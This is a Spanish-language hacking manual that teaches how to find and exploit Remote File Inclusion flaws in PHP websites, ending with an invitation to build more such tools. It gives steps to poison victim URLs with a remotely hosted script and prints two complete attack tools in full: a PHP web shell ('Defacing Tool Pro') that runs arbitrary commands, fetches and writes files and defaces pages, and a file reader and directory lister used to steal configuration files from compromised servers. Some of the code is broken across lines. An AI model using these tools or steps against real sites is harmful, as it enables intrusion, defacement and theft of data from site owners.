Índice
1.- Introducción
2.- Requisitos
3.- Definición
4.- Descubriendo si una web es vulnerable
5.- Explotando RFI
5.1.-¿¿¿Como usar un script para RFI???
5.1.1.- Consola de comandos en PHP
5.1.2.- Explorando el servidor
6.- Otros exploits y haciendo nuestras tools.
7.- Despedida
Introducción
Este manual es el segundo de una serie que planeo publicar sobre la explotación de
vulnerabilidad
es a nivel web, o sea que, sin necesidad de exploit, se exploten por errores propios, o sea, por la mal manejo en líneas de código/administración de un espacio web.
Requisitos
Bueno, esta vulnerabilidad parece mas fácil de explotar que XSS, y no les mentiré, a mi gusto, lo es y mucho mas útil.
Sin embargo, para explotarla RECOMIENDO uno sólidos conocimientos en PHP así como manejar al 100% la consola de comandos de sistemas Linux.
Definición
RFI (Remote File Inclusión), traducido al español como Inclusión Remota de Archivos es una vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().
Este tipo de vulnerabilidad no se da en páginas programas en ASP o en cualquier otro tipo de lenguaje similar que no contenga la posibilidad de la inclusión remota de archivos ajenos al servidor.
Bueno, esto es muy simple, la función:
include(“algo”);
Es la que suele ser vulnerable, lo que pasa es que la función "include();" permite incluir archivos dentro del mismo documento como si fuesen parte del texto, entonces cuando el include maneja una variable:
include(“$var”);
y el webmaster que programa la pagina no se cerciora que únicamente el servidor pueda modificar esa variable, hemos encontrado una web vulnerable a RFI.
Descubriendo si una web es vulnerable
Bueno, las webs que podrían ser vulnerables son las que utilizan el método GET, o sea, que vinculan directamente las variables con la URL:
http://www.miwebsite.com/buscar.php?busqueda=hack
Ese es un link inventado pro supuesto. ¿Qué vemos ahi? Que la pagina
http://www.miwebsite.com
es un buscador, y que llamo al programa
buscar.php
y este se ejecuto con la variable
búsqueda = hack
bueno, las URL`s de ese tipo SON LAS QUE PODRIAN SER VULNERABLES.
Bueno bueno, dirán, ya mueks, mucha plática y poca acción, como puedo saber si la web X es vulnerable a RFI?
Pues bueno, cojemos la URL de la web que queremos vulnerar y la envenenamos de la siguiente forma:
http://www.webavulnerar.com/index.php?variable=http://www.unawebcualquiera.com
Si nos redireciona a http://www.unawebcualquiera.com, felicidades, es vulnerable a RFI.
Explotando RFI
Bueno, ya tenemos una web vulnerable, ahora lo que resta será explotarla.
Como?
Bueno, lo primero es que en la web hay muchísimos scripts que permiten aprovecharnos de esta vulnerabilidad, primero les daré una introducción de como usarlos, y luego les mostrare una recopilación de algunos que encontré por la web.
¿¿¿Como usar un script para RFI???
Primero que nada necesitaremos un host gratuito que soporte PHP.
A este host le subiremos el script de modo de modo que lo podamos llamar de la variable a vulnerar.
Me explico:
Tengo el Script X, lo subo a mi host con terminación gif o txt, esto es de suma importancia, si lo subo con terminación PHP, lo ejecutaremos de forma local, en lugar de remota.
Y la URL quedaría así:
http://www.mihost.com/index.php?exploit.gif
Ahora, el modo de envenenar la URL seria de la siguiente manera:
http://www.victima.com/index.php?page=http://www.mihost.com/index.php?exploit.gif
ahora, pasemos a recapitular algunos scripts.
Consola de comandos en PHP.
Bueno, este es un clásico de clásicos, permite la ejecución de comandos tipo Linux remotamente al servidor.
Sin embargo, algunos servidores tienen las funciones exec, system y passthru
Deshabilitadas, por lo que este exploit no te servirá.
Aquí el exploit, recuerden renombrarlo a gif, subirlo y finalmente envenenar la URL y empezar a ejecutar comandos Linux.
<!--
Defacing Tool Pro v1.6 by r3v3ng4ns
Autor: r3v3ng4ns - revengans@hotmail.com
Modifique, copie e distribua mas, por favor, mantenha o nome dos autores originais
-->
<?php
@closelog();
@error_reporting(0);
$vers="1.6beta";
$remote_addr="http://127.0.0.1/~snagnever/defacement/paginanova/";//url
$format_addr=".txt";//formato
$string_addr=$remote_addr."pro16".$format_addr;//cmd
$safe_addr=$remote_addr."safe16".$format_addr;//safemode
$writer_addr=$remote_addr."writer16".$format_addr;//writer
$phpget_addr=$remote_addr."get16".$format_addr;//phpget
$feditor_addr=$remote_addr."feditor".$format_addr;//main feditor
$put_addr=$remote_addr."feditor_put".$format_addr;//file writer
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$chdir=$_GET['chdir'];
if($chdir=="")$chdir=getcwd();
$cmd=$_GET['cmd'];
$cmd=stripslashes($cmd);
$ch_msg="";
$login=@posix_getuid();
$euid=@posix_geteuid();
$gid=@posix_getgid();
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$diretorio = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$diretorio = str_replace($lastDir,"",$chdir);
if($diretorio=="/")$chdir="";
}
if(strrpos($diretorio,"/")==(strlen($diretorio)-1))
$diretorio=substr($diretorio,0,strrpos($diretorio,"/"));
if(@opendir($diretorio)!==false) $chdir=$diretorio;
else if(@opendir($chdir."/".$diretorio)!==false) $chdir=$chdir."/".$diretorio;
else $ch_msg="dtool: line 1: chdir: $diretorio: No such directory or permission denied.\n";
if($boom2['1']==null) $cmd = $boom['2']; else $cmd = $boom2['1'].$boom2['2'];
}
$cmdshow=$cmd;
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else
$showdir="+'chdir=$chdir&'";
if (@is_dir("/usr/X11R6/")) $pro0="
X11 em /usr/X11R6/, ";
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="
xterm em /usr/X11R6/bin/xterm,
";
if (@file_exists("/usr/bin/nc")) $pro2="
nc em /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="
wget em /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="
lynx em /usr/bin/lynx, ";
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$pro=$pro0.$pro1.$pro2.$pro3.$pro4;
if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);}
else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);}
else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);}
else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);}
else if($cmd=='ls'){$cmd = "ls -F";}
if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir);
?>
<body
onload="window.documen
t.c.comando.fo
cus();window.documen
t.c.comando.se
lect();">
<style>.campo{font-family: Verdana;
color:white;font-size:11px;background-color:#414978;}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.
substring(0,location.href.indexOf('?')+1);var stri
= location.href.
substring(addr.length,location.href.length+1);inclvar =
stri.substring(0,stri.indexOf('='));}
function
enviaCMD(){inclVar();window.documen
t.location.hre
f='<?=$total_addr;?>'+'?'+inclvar+'='
+'<?=$string_addr;?>'+'?&'<?=$showdir;?>+'cmd='+window.document.c.comando.value;re
turn false;}
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM
do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou
ftp://:","");var dir = c.substring(0,c.lastIndexOf('/')+1);var file =
c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o
DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser
writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$php
get_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a
URL do frame","http://www.geocities.com/revensite/index.htm");var dir =
url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var
f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize
caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);
t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned
you
");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='
+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function resumir() {inclVar();
resumo='<DIV STYLE="font-family: verdana; font-size: 11px;">
<?=$total_addr;?>?'+inclvar+'=<?=$string_addr;?><?php
$uname = posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<?= $info ?>: <?= $value
?>
<?php } ?>
default user: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?=
$gid ?>)
ip: <?=$ip;?>
server info:
<?="$SERVER_SOFTWARE $SERVER_VERSION";?>
pro info:
<?=$pro;?>
path da pagina: <?= getcwd() ?>
path
writable:<? if(@is_writable(getcwd())){ echo "
YES"; }else{ echo " no"; } ?>'
jan=open("","jan","width=580,height=300,menubar=yes,scrollbars=yes,resizable=yes,");jan.
document.write(resumo);jan.document.w
rite("<p> <? echo str_repeat("==",
35)?></p>");jan.document.t
itle="Resumo do servidor";jan.focus();}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome
do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use
http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var
file =
o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$fedito
r_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a
SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$sa
fe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0"
bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod">
[ Defacing Tool Pro v<?=$vers;?> ] <a
href="javascript:window.open('<?=$remote_addr;?>help.txt');">?[/url]
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0"
CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop">
<?=$info ?>:<?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop">
user: uid(<?=$login;?>) euid(<?=$euid;?>)
gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod">
write permission:<? if(@is_writable($chdir)){
echo "
YES"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop">
server info: <?="$SERVER_SOFTWARE
$SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop">
pro info: ip <?="$ip,
$pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop">
original path: <?=getcwd()
?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod">
current path: <?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="c" id="c" method="post" action="#" onSubmit="return
enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0"
bordercolor="#414978"><tr><td><table width="370" border="0" align="center"
cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="comando" type="text" id="comando"
value='<?=$cmdshow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);
ob_start();
function safemode($what){echo "It seems that this server is using php in safemode. Try to
use DTool in Safemode.";}
$funE="function_exist
s";
if($funE('passthru'))$fe="passthru";
elseif($funE('system'))$fe="system";
elseif($funE('shell_exec'))$fe="shell_exec";
else $fe="safemode";
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="snd cmd" class="campo"
onClick="enviaCMD()"><input type="button" name="getBtn" value="PHPget"
class="campo" onClick="PHPget()"><input type="button" name="writerBtn"
value="PHPwriter" class="campo" onClick="PHPwriter()"><input type="button"
name="edBtn" value="Fileditor" class="campo" onClick="PHPf()"><input type="button"
name="resBtn" value="resumir" class="campo" onClick="resumir()"><input type="button"
name="smBtn" value="safemode" class="campo" onClick="safeMode()"><input
type="button" name="gsBtn" value="open shell" class="campo"
onClick="inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$remote_addr;?>
pro16s.txt');"
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod">
stdOut from <?="\"
$cmdshow\",
using
$fe()";?></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10"
STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px;
background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir
<diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele.
Precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter,
PHPfilEditor e Resumir\nconsulte http://www.geocities.com/revensite/help.txt");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr></table>
Explorando el servidor
Para aquellos que intentan vulnerar un servidor donde se tiene las funciones exec, system y passthru deshabilitadas, con este exploit se puede hacer una exploración de las carpetas del servidor ( sea Windows o Linux ) y permitirnos planear una escalada de privilegios.
<?
/*
Copyright dec. 2004 - CODEBREAK (codebreak@walla.com)
Esta utilidad sirve para hacer una intrusión en servidores. Es muy útil
Cuando se trata de servidores bajo Windows, Linux con passthru, system
o exec desactivado. Muy útil en caso de RFI, o simplemente para explorar
el servidor al lograr subir este PHP.
El diseño es simple, puede tener bugs y la exploración via enlace se va
acumulando, funciona igual y no quize hacerlo mas complejo.
Notas:
- Si cambias el nombre de este archivo (cbreak.php) no va a funcionar.
- Al explorar directorios via enlace, puede reconocer como archivos
aquellos directorios con punto. En este caso, explora via manual (como
explica en el index)
Cualquier modificación, porfavor hacerla con una referencia al autor
original. Si quieres publicar una modificación, porfavor compartela
mandandomela al e-mail antes indicado. XD
www.codebreak1
984.tk
*/
// Porsiaca el servidor se pone reclamon con uso de variables externas...
$mode = $_GET['mode'];
$cat = $_GET['cat'];
$dir = $_GET['dir'];
// Index Inicial: sin opción seleccionada
if($mode=="")
{
echo"<title>Server Xplorer -Por Codebreak-</title>";
echo"<body bgcolor=#000000><center>";
echo"<p><font face=Fixedsys size=5><font color=#FF0000>S</font><font
color=#FFFFFF>erver ";
echo"</font><font color=#FF0000>X</font><font color=#FFFFFF>plorer 2.0 </font>";
echo"<font color=#FF0000>p</font><font color=#FFFFFF>or </font>";
echo"<font color=#FF0000>c</font><font color=#FFFFFF>odebreak
";
echo"</font></font><font color=#FFFFFF>
";
echo" </font></p>";
echo"</center>";
echo"<p align=justify><font face=Fixedsys color=#FF0000>1.-</font><font
color=#FFFFFF face=Fixedsys><a href=?mode=steal><font color=#3366FF>Roba ";
echo"Source</font>[/url]:
";
echo" Con esto podemos leer en texto plano el código de cualquier
";
echo"archivo en el servidor (ya sea php, htaccess, logs, etc..). Es un
reemplazo ";
echo"del comando "cat archivo.x" de linux. Nos sirve cuando queremos usar
una shell y ";
echo"claro... el servidor
no nos permite (passtrhu desactivado, etc...) o debido a
que corre bajo Windows.
";
echo"
";
echo"</font><font size=2 face=Arial color=#C0C0C0>Ejemplo de Uso:
";
echo"www.sitio.com/cbreak.php?mode=steal&cat=../../../home/user/public_html/co
nfig.php</font></p>";
echo"<p align=left> </p>";
echo"<p align=justify><font face=Fixedsys color=#FF0000>2.-</font><font
color=#FFFFFF face=Fixedsys><a href=?mode=list><font color=#3366FF>Directory ";
echo"Listing</font>[/url]:
";
echo" Podemos ver todos los archivos y directorios en una carpeta.
";
echo"Reemplaza el comando "ls", al igual que antes, cuando no podemos
utilizar shell o cuando corre bajo Windows.";
echo"
Muestra todos los archivos y directorios como enlaces, si presionas uno de ";
echo"estos enlaces podrás ver el contenido (código) de dicho archivo. Si se trata de ";
echo"un directorio, te dará un error.
";
echo"Nos va a ser muy útil para explorar los directorios y saber donde estan las ";
echo"configuracione
s.
";
echo"
";
echo"</font><font face=Fixedsys color=#C0C0C0>
Nota: Nos va a indicar en ";
echo"donde se ejecuto el script, a modo de saber cual es la dirección de los ";
echo"directorios (en este caso: home/user/public_html/).</font><font color=#FFFFFF
face=Fixedsys>
";
echo"
";
echo"</font><font size=2 face=Arial color=#C0C0C0>Ejemplo de Uso:
";
echo"www.sitio.com/cbreak.php?mode=list&dir=home/user/public_html/</font></
p>";
echo"<center>";
echo"<p> </p>";
echo"<p><BR>
<font face=Courier New size=1 color=#C0C0C0>Creado por
codebreak
codebreak@walla.com
www.codebreak1 984.tk</font></p>
";
echo"</center>";
}
elseif($mode=="steal")
{
// Modo 1: Robar codigo
echo "<html>";
echo "<head>";
echo "<title>Cat command -By Codebreak-</title>";
echo "</head>";
echo "<body>";
// Si no indicamos archivos, probar el concepto mostrando el codigo de esta aplicación
if($cat=="")
{
$cat="cbreak.php";
}
$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "Kb";
echo"<body bgcolor=#000000><center><font color=#FF0000 face=Fixedsys
size=2>V</font><font color=#FFFFFF face=Fixedsys size=2>iendo <B>$cat</B> -
</font><font color=#FF0000 face=Fixedsys size=2>T</font><font color=#FFFFFF
face=Fixedsys size=2>amaño: <B>$file_size</B></font><table width=94% border=2
bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse:
collapse cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table><BR>
<font face=Courier New size=1
color=#C0C0C0>Creado por
codebreak
codebreak@walla.com
www.codebreak1 984.tk</font></cen
ter>";
echo "</body></html>";
}
elseif($mode=="list")
{
// Modo 2: Explorar Directorios
echo"<title>Directory Listing -By Codebreak-</title>";
$base =
substr($_SERVER['PATH_TRANSLATE
D'],0,strrpos($_SERVER['PATH_TRANSLA
TED'],'/'));
// Mostrar contenido de directorio inicial
if($dir=="")
{
$dir="./";
}
$path = $dir;
// Funcion simple reconocer archivos (php.net)
function after ($this, $inthat)
{
if (!is_bool(strpos($inthat, $this)))
return substr($inthat, strpos($inthat,$this)+strlen($this));
}
echo "<body bgcolor=#000000><center><font face=Fixedsys size=2
color=#FF0000>E</font><font face=Fixedsys size=2 color=#FFFFFF>jecutando
</font><font face=Fixedsys size=2 color=#FF0000>e</font><font face=Fixedsys size=2
color=#FFFFFF>n: <B>$base
</B></font><font face=Fixedsys size=2
color=#FF0000>V</font><font face=Fixedsys size=2 color=#FFFFFF>iendo
</font><font face=Fixedsys size=2 color=#FF0000>D</font><font face=Fixedsys
size=2 color=#FFFFFF>irectorio:<B>$dir</B></font><table width=94% border=2
bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse:
collapse cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("No se pudo abrir $path");
while (false !== ($file = readdir($dir_handle))) {
$link = "<a target=_blank href=cbreak.php?mode=steal&cat=$dir/$file><font
color=#000080>$file</font>[/url]
";
$formato = after('.', $file);
// Reconocer posición de retroceder
If($formato==".") {
$link = "
<a href=cbreak.php?mode=list&dir=$dir/$file>retroceder..[/url]
";
}
// Muy simple: Sin formato, debe ser directorio (aquí error en directorios con puntos)
If($formato=="") {
$link = "<a href=cbreak.php?mode=list&dir=$dir/$file><font
color=#800000>$file</font>[/url]
";
}
// Mostrar directorio, archivo o retroceder (con colores, claro, para no confundir XD)
echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table><BR>
<font face=Courier New size=1
color=#C0C0C0>Creado por
codebreak
codebreak@walla.com
www.codebreak1 984.tk</font></cen
ter>";
}
?>
Otros exploits y haciendo nuestras tools.
Bueno, estos son dos exploits con los que pueden empezar, hay decenas mas, busquen en google, como exploits para RFI y verán.
Hay para hacer de todo, para burlar muchas limitaciones de seguridad que ponen los servidores.
Hay back doors basados en PHP, root kits, etc…
Sin embargo, ustedes pueden hacer sus propias herramientas para RFI, solo es necesario que sepan bien PHP y pongan de limite la imaginación.
Despedida
Bueno, espero que este manual les sea de utilidad, es mi segunda entrega en esta comunidad, y espero que tenga buena acogida, si algo le falta o algo no esta 100% explicado, díganme, y lo ampliare.
Pueden distribuir este manual libremente, siempre y cuando, pongan un link al lugar de su ubicación original y se respete el nombre del autor ( o sea, yo, mueks ).
Salu2
Autor